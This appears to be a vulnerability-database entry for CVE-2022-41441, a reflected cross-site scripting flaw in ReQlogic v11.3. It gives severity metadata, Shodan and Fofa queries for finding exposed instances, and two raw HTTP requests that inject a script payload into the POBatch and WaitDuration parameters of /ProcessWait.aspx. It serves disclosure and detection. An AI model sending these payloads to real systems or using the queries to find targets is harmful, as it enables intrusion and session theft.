| Title | ReQlogic v11.3 - Cross Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3. |
| CVSS Score | 6.1 |
| EPSS Score | 0.0698 |
| CVE ID | CVE-2022-41441 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"ReQlogic"http.html:"reqlogic" |
| Fofa Query | body="reqlogic" |
| Tags | cve cve2022 packetstorm xss reqlogic vuln |
ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.
GET /ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-41441.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-41441.pcap
N/AN/A